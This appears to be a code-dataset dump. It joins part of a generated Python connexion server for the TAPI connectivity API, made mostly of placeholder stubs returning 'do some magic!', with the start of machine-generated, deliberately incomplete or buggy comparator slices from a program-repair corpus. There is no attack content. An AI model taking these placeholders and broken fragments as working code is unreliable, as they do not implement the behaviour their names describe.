return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_burst_size_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_burst_size_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_burst_size_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_burst_size_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_burst_size_post(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_burst_size_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_burst_size_put(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_burst_size_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_information_rate_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_information_rate_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_information_rate_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_information_rate_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_information_rate_post(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_information_rate_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_information_rate_put(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_peak_information_rate_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_post(uuid, tapi_common_bandwidth_profile=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_post
creates tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_bandwidth_profile: tapi.common.BandwidthProfile to be added to list
:type tapi_common_bandwidth_profile: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_bandwidth_profile = TapiCommonBandwidthProfile.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_put(uuid, tapi_common_bandwidth_profile=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_put
creates or updates tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_bandwidth_profile: tapi.common.BandwidthProfile to be added or updated
:type tapi_common_bandwidth_profile: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_bandwidth_profile = TapiCommonBandwidthProfile.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_delete
removes tapi.common.Capacity # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_get
returns tapi.common.Capacity # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiCommonCapacity
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_post(uuid, tapi_common_capacity=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_post
creates tapi.common.Capacity # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity: tapi.common.Capacity to be added to list
:type tapi_common_capacity: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity = TapiCommonCapacity.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_put(uuid, tapi_common_capacity=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_put
creates or updates tapi.common.Capacity # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity: tapi.common.Capacity to be added or updated
:type tapi_common_capacity: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity = TapiCommonCapacity.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_total_size_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_total_size_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_total_size_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_total_size_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_total_size_post(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_total_size_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_total_size_put(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_total_size_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_resilience_type_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_resilience_type_delete
removes tapi.topology.ResilienceType # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_resilience_type_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_resilience_type_get
returns tapi.topology.ResilienceType # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiTopologyResilienceType
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_resilience_type_post(uuid, tapi_topology_resilience_type=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_resilience_type_post
creates tapi.topology.ResilienceType # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_topology_resilience_type: tapi.topology.ResilienceType to be added to list
:type tapi_topology_resilience_type: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_resilience_type = TapiTopologyResilienceType.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_resilience_type_put(uuid, tapi_topology_resilience_type=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_resilience_type_put
creates or updates tapi.topology.ResilienceType # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_topology_resilience_type: tapi.topology.ResilienceType to be added or updated
:type tapi_topology_resilience_type: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_resilience_type = TapiTopologyResilienceType.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristic_post(uuid, tapi_topology_risk_characteristic=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristic_post
creates tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_topology_risk_characteristic: tapi.topology.RiskCharacteristic to be added to list
:type tapi_topology_risk_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_risk_characteristic = TapiTopologyRiskCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristicrisk_characteristic_name_delete(uuid, risk_characteristic_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristicrisk_characteristic_name_delete
removes tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param risk_characteristic_name: Id of risk-diversity-characteristic
:type risk_characteristic_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristicrisk_characteristic_name_get(uuid, risk_characteristic_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristicrisk_characteristic_name_get
returns tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param risk_characteristic_name: Id of risk-diversity-characteristic
:type risk_characteristic_name: str
:rtype: TapiTopologyRiskCharacteristic
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristicrisk_characteristic_name_post(uuid, risk_characteristic_name, tapi_topology_risk_characteristic=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristicrisk_characteristic_name_post
creates tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param risk_characteristic_name: Id of risk-diversity-characteristic
:type risk_characteristic_name: str
:param tapi_topology_risk_characteristic: tapi.topology.RiskCharacteristic to be added to list
:type tapi_topology_risk_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_risk_characteristic = TapiTopologyRiskCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristicrisk_characteristic_name_put(uuid, risk_characteristic_name, tapi_topology_risk_characteristic=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_risk_diversity_characteristicrisk_characteristic_name_put
creates or updates tapi.topology.RiskCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param risk_characteristic_name: Id of risk-diversity-characteristic
:type risk_characteristic_name: str
:param tapi_topology_risk_characteristic: tapi.topology.RiskCharacteristic to be added or updated
:type tapi_topology_risk_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_risk_characteristic = TapiTopologyRiskCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_schedule_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_schedule_delete
removes tapi.common.TimeRange # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_schedule_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_schedule_get
returns tapi.common.TimeRange # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiCommonTimeRange
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_schedule_post(uuid, tapi_common_time_range=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_schedule_post
creates tapi.common.TimeRange # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_time_range: tapi.common.TimeRange to be added to list
:type tapi_common_time_range: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_time_range = TapiCommonTimeRange.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_schedule_put(uuid, tapi_common_time_range=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_schedule_put
creates or updates tapi.common.TimeRange # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_time_range: tapi.common.TimeRange to be added or updated
:type tapi_common_time_range: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_time_range = TapiCommonTimeRange.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_delete(): # noqa: E501
"""data_context_connectivity_context_delete
removes tapi.connectivity.ConnectivityContext # noqa: E501
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_get(): # noqa: E501
"""data_context_connectivity_context_get
returns tapi.connectivity.ConnectivityContext # noqa: E501
:rtype: TapiConnectivityConnectivityContext
"""
return 'do some magic!'
def data_context_connectivity_context_post(tapi_connectivity_connectivity_context=None): # noqa: E501
"""data_context_connectivity_context_post
creates tapi.connectivity.ConnectivityContext # noqa: E501
:param tapi_connectivity_connectivity_context: tapi.connectivity.ConnectivityContext to be added to list
:type tapi_connectivity_connectivity_context: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivity_context = TapiConnectivityConnectivityContext.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_put(tapi_connectivity_connectivity_context=None): # noqa: E501
"""data_context_connectivity_context_put
creates or updates tapi.connectivity.ConnectivityContext # noqa: E501
:param tapi_connectivity_connectivity_context: tapi.connectivity.ConnectivityContext to be added or updated
:type tapi_connectivity_connectivity_context: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivity_context = TapiConnectivityConnectivityContext.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
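# Naming convention: each operationId encodes the RESTCONF data path plus the
# HTTP verb, with one path key appended per list level, so
# data_context_connectivity_context_connectivity_serviceuuid_get presumably
# serves GET .../data/context/connectivity-context/connectivity-service={uuid}
# (the exact URI spellings live in the OpenAPI document, not in this module).
# The topology-context handlers below follow the same scheme, which is why
# their names grow with every nested list key.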
def data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_aggregated_connection_end_pointtopology_uuidaggregated_connection_end_point_node_uuidnode_edge_point_uuidaggregated_connection_end_point_connection_end_point_uuid_get(uuid, node_uuid, owned_node_edge_point_uuid, connection_end_point_uuid, topology_uuid, aggregated_connection_end_point_node_uuid, node_edge_point_uuid, aggregated_connection_end_point_connection_end_point_uuid): # noqa: E501
"""data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_aggregated_connection_end_pointtopology_uuidaggregated_connection_end_point_node_uuidnode_edge_point_uuidaggregated_connection_end_point_connection_end_point_uuid_get
returns tapi.connectivity.ConnectionEndPointRef # noqa: E501
:param uuid: Id of topology
:type uuid: str
:param node_uuid: Id of node
:type node_uuid: str
:param owned_node_edge_point_uuid: Id of owned-node-edge-point
:type owned_node_edge_point_uuid: str
:param connection_end_point_uuid: Id of connection-end-point
:type connection_end_point_uuid: str
:param topology_uuid: Id of aggregated-connection-end-point
:type topology_uuid: str
:param aggregated_connection_end_point_node_uuid: Id of aggregated-connection-end-point
:type aggregated_connection_end_point_node_uuid: str
:param node_edge_point_uuid: Id of aggregated-connection-end-point
:type node_edge_point_uuid: str
:param aggregated_connection_end_point_connection_end_point_uuid: Id of aggregated-connection-end-point
:type aggregated_connection_end_point_connection_end_point_uuid: str
:rtype: TapiConnectivityConnectionEndPointRef
"""
return 'do some magic!'
def data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_client_node_edge_pointtopology_uuidclient_node_edge_point_node_uuidnode_edge_point_uuid_get(uuid, node_uuid, owned_node_edge_point_uuid, connection_end_point_uuid, topology_uuid, client_node_edge_point_node_uuid, node_edge_point_uuid): # noqa: E501
"""data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_client_node_edge_pointtopology_uuidclient_node_edge_point_node_uuidnode_edge_point_uuid_get
returns tapi.topology.NodeEdgePointRef # noqa: E501
:param uuid: Id of topology
:type uuid: str
:param node_uuid: Id of node
:type node_uuid: str
:param owned_node_edge_point_uuid: Id of owned-node-edge-point
:type owned_node_edge_point_uuid: str
:param connection_end_point_uuid: Id of connection-end-point
:type connection_end_point_uuid: str
:param topology_uuid: Id of client-node-edge-point
:type topology_uuid: str
:param client_node_edge_point_node_uuid: Id of client-node-edge-point
:type client_node_edge_point_node_uuid: str
:param node_edge_point_uuid: Id of client-node-edge-point
:type node_edge_point_uuid: str
:rtype: TapiTopologyNodeEdgePointRef
"""
return 'do some magic!'
def data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_get(uuid, node_uuid, owned_node_edge_point_uuid, connection_end_point_uuid): # noqa: E501
"""data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_get
returns tapi.connectivity.ceplist.ConnectionEndPoint # noqa: E501
:param uuid: Id of topology
:type uuid: str
:param node_uuid: Id of node
:type node_uuid: str
:param owned_node_edge_point_uuid: Id of owned-node-edge-point
:type owned_node_edge_point_uuid: str
:param connection_end_point_uuid: Id of connection-end-point
:type connection_end_point_uuid: str
:rtype: TapiConnectivityCeplistConnectionEndPoint
"""
return 'do some magic!'
def data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_namevalue_name_get(uuid, node_uuid, owned_node_edge_point_uuid, connection_end_point_uuid, value_name): # noqa: E501
"""data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of topology
:type uuid: str
:param node_uuid: Id of node
:type node_uuid: str
:param owned_node_edge_point_uuid: Id of owned-node-edge-point
:type owned_node_edge_point_uuid: str
:param connection_end_point_uuid: Id of connection-end-point
:type connection_end_point_uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_parent_node_edge_point_get(uuid, node_uuid, owned_node_edge_point_uuid, connection_end_point_uuid): # noqa: E501
"""data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_connection_end_pointconnection_end_point_uuid_parent_node_edge_point_get
returns tapi.topology.NodeEdgePointRef # noqa: E501
:param uuid: Id of topology
:type uuid: str
:param node_uuid: Id of node
:type node_uuid: str
:param owned_node_edge_point_uuid: Id of owned-node-edge-point
:type owned_node_edge_point_uuid: str
:param connection_end_point_uuid: Id of connection-end-point
:type connection_end_point_uuid: str
:rtype: TapiTopologyNodeEdgePointRef
"""
return 'do some magic!'
def data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_get(uuid, node_uuid, owned_node_edge_point_uuid): # noqa: E501
"""data_context_topology_context_topologyuuid_nodenode_uuid_owned_node_edge_pointowned_node_edge_point_uuid_cep_list_get
returns tapi.connectivity.context.topologycontext.topology.node.ownednodeedgepoint.CepList # noqa: E501
:param uuid: Id of topology
:type uuid: str
:param node_uuid: Id of node
:type node_uuid: str
:param owned_node_edge_point_uuid: Id of owned-node-edge-point
:type owned_node_edge_point_uuid: str
:rtype: TapiConnectivityContextTopologycontextTopologyNodeOwnednodeedgepointCepList
"""
return 'do some magic!'
def operations_create_connectivity_service_post(inline_object1=None): # noqa: E501
"""operations_create_connectivity_service_post
# noqa: E501
:param inline_object1:
:type inline_object1: dict | bytes
:rtype: TapiConnectivityCreateConnectivityService
"""
if connexion.request.is_json:
inline_object1 = InlineObject1.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def operations_delete_connectivity_service_post(inline_object6=None): # noqa: E501
"""operations_delete_connectivity_service_post
# noqa: E501
:param inline_object6:
:type inline_object6: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
inline_object6 = InlineObject6.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def operations_get_connection_details_post(inline_object12=None): # noqa: E501
"""operations_get_connection_details_post
# noqa: E501
:param inline_object12:
:type inline_object12: dict | bytes
:rtype: TapiConnectivityGetConnectionDetails
"""
if connexion.request.is_json:
inline_object12 = InlineObject12.from_dict(connexion.request.get_json()) # noqa: E501
return TapiConnectivityGetConnectionDetails(TapiConnectivityGetconnectiondetailsOutput(
database.connection(inline_object12.input.connection_id_or_name)))
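# Unlike the CRUD stubs above, this RPC is actually wired to the backing
# store: the deserialized input's connection_id_or_name is passed to
# database.connection(...) and the result is wrapped in the generated output
# envelope. Note that when the request body is not JSON, inline_object12
# stays None and the .input access raises AttributeError, so a guard clause
# would be needed in production.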
def operations_get_connection_end_point_details_post(inline_object13=None): # noqa: E501
"""operations_get_connection_end_point_details_post
# noqa: E501
:param inline_object13:
:type inline_object13: dict | bytes
:rtype: TapiConnectivityGetConnectionEndPointDetails
"""
if connexion.request.is_json:
inline_object13 = InlineObject13.from_dict(connexion.request.get_json()) # noqa: E501
return TapiConnectivityGetConnectionEndPointDetails(TapiConnectivityGetconnectionendpointdetailsOutput(
database.connection_end_point(inline_object13.input.topology_id_or_name,
inline_object13.input.node_id_or_name,
inline_object13.input.nep_id_or_name,
inline_object13.input.cep_id_or_name)))
def operations_get_connectivity_service_details_post(inline_object14=None): # noqa: E501
"""operations_get_connectivity_service_details_post
# noqa: E501
:param inline_object14:
:type inline_object14: dict | bytes
:rtype: TapiConnectivityGetConnectivityServiceDetails
"""
if connexion.request.is_json:
inline_object14 = InlineObject14.from_dict(connexion.request.get_json()) # noqa: E501
return TapiConnectivityGetConnectivityServiceDetails(TapiConnectivityGetconnectivityservicedetailsOutput(
database.connectivity_service(inline_object14.input.service_id_or_name)))
def operations_get_connectivity_service_list_post(): # noqa: E501
"""operations_get_connectivity_service_list_post
# noqa: E501
:rtype: TapiConnectivityGetConnectivityServiceList
"""
return TapiConnectivityGetConnectivityServiceList(TapiConnectivityGetconnectivityservicelistOutput(
database.connectivity_service_list()))
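# A hypothetical invocation of the list RPC above (host, port and the
# /operations prefix are assumptions; the real mount point depends on how the
# connexion app is configured):
#
#     curl -X POST http://localhost:8080/operations/get-connectivity-service-list/
#
# returning the JSON serialization of TapiConnectivityGetConnectivityServiceList
# built from database.connectivity_service_list().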
def operations_update_connectivity_service_post(inline_object27=None): # noqa: E501
"""operations_update_connectivity_service_post
# noqa: E501
:param inline_object27:
:type inline_object27: dict | bytes
:rtype: TapiConnectivityUpdateConnectivityService
"""
if connexion.request.is_json:
inline_object27 = InlineObject27.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
| 41.182339 | 556 | 0.800832 | 13,224 | 107,733 | 6.116984 | 0.017015 | 0.124019 | 0.080751 | 0.105327 | 0.946743 | 0.939388 | 0.926704 | 0.915244 | 0.898926 | 0.882335 | 0 | 0.014707 | 0.139753 | 107,733 | 2,615 | 557 | 41.198088 | 0.85812 | 0.542211 | 0 | 0.559761 | 0 | 0 | 0.048704 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.308765 | false | 0 | 0.09761 | 0 | 0.715139 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7af9cf07651e1f8f38bd381c8104d7aea10bc49a | 18,550 | py | Python | projects/src/main/python/CodeJam/Y12R5P1/lidaobing/generated_py_416e6bb71b9f462696a15c44a1c5682e.py | DynamicCodeSearch/CodeSeer | ee985ece7691691585952eb88565f0e08bdc9113 | ["MIT"] | 5 | 2020-04-05T18:04:13.000Z | 2021-04-13T20:34:19.000Z | projects/src/main/python/CodeJam/Y12R5P1/lidaobing/generated_py_416e6bb71b9f462696a15c44a1c5682e.py | DynamicCodeSearch/CodeSeer | ee985ece7691691585952eb88565f0e08bdc9113 | ["MIT"] | 1 | 2020-04-29T21:42:26.000Z | 2020-05-01T23:45:45.000Z | projects/src/main/python/CodeJam/Y12R5P1/lidaobing/generated_py_416e6bb71b9f462696a15c44a1c5682e.py | DynamicCodeSearch/CodeSeer | ee985ece7691691585952eb88565f0e08bdc9113 | ["MIT"] | 3 | 2020-01-27T16:02:14.000Z | 2021-02-08T13:25:15.000Z |
import sys
sys.path.append('/home/george2/Raise/ProgramRepair/CodeSeer/projects/src/main/python')
from CodeJam.Y12R5P1.lidaobing.A import *
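# The hex-named functions below are machine-generated single-return slices of
# the Y12R5P1 solution (CodeSeer program-repair corpus), so many are
# intentionally incomplete or buggy: undefined names (e.g. `b` used before
# assignment), unused intermediates, and returns of the comprehension
# variable `x`. They assume Python 2 semantics, where list-comprehension
# variables leak into the enclosing scope and sorted() accepts a cmp=
# argument. A Python 3 equivalent of the sort calls would be, for example:
#
#     import functools
#     c = sorted(c, key=functools.cmp_to_key(cmp1))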
def func_b21629aeedcc4506bd98fdca617b8110(b1, a0, b0, a1):
t1 = a0 * (100 - b1)
t2 = a1 * (100 - b0)
return t1
def func_1f21dc2c030e43b79682e619fb0ad0c1(b1, a0, b0, a1):
t1 = a0 * (100 - b1)
t2 = a1 * (100 - b0)
return t2
def func_d53b6ae4f2e74a9b86547cecc58c127c(i1, i0, b0, a1, t1):
t2 = a1 * (100 - b0)
if t1 == t2:
return i0 - i1
return t2
def func_ff5f20fd299749928c1688ee83671fe8(t2, t1):
if t1 < t2:
return -1
return 1
def func_85d05fb5f1f149e6ad753074ca8ed29e(b1, i1, a0, i0, b0, a1):
t1 = a0 * (100 - b1)
t2 = a1 * (100 - b0)
if t1 == t2:
return i0 - i1
return t1
def func_7a04110b62cd42bb9681703246cc5c72(b1, i1, a0, i0, b0, a1):
t1 = a0 * (100 - b1)
t2 = a1 * (100 - b0)
if t1 == t2:
return i0 - i1
return t2
def func_8fce2d18b1024bf681c5b53e1fff3b3b(i1, i0, b0, a1, t1):
t2 = a1 * (100 - b0)
if t1 == t2:
return i0 - i1
if t1 < t2:
return -1
return t2
def func_9ee65ad6d5954368a2fd49282fe0ce3d(t2, i1, i0, t1):
if t1 == t2:
return i0 - i1
if t1 < t2:
return -1
return 1
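# Comparator core: comparing t1 = a0*(100-b1) with t2 = a1*(100-b0) is a
# cross-multiplication that orders the two items by the ratio a/(100-b)
# without floating-point division (both denominators being positive), and the
# i0 - i1 fallback keeps the ordering stable on ties. cmp1, pulled in by the
# star import above, presumably implements this same rule for sorted().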
def func_a0bb0d462148497887e8a07735209082(b1, i1, a0, i0, b0, a1):
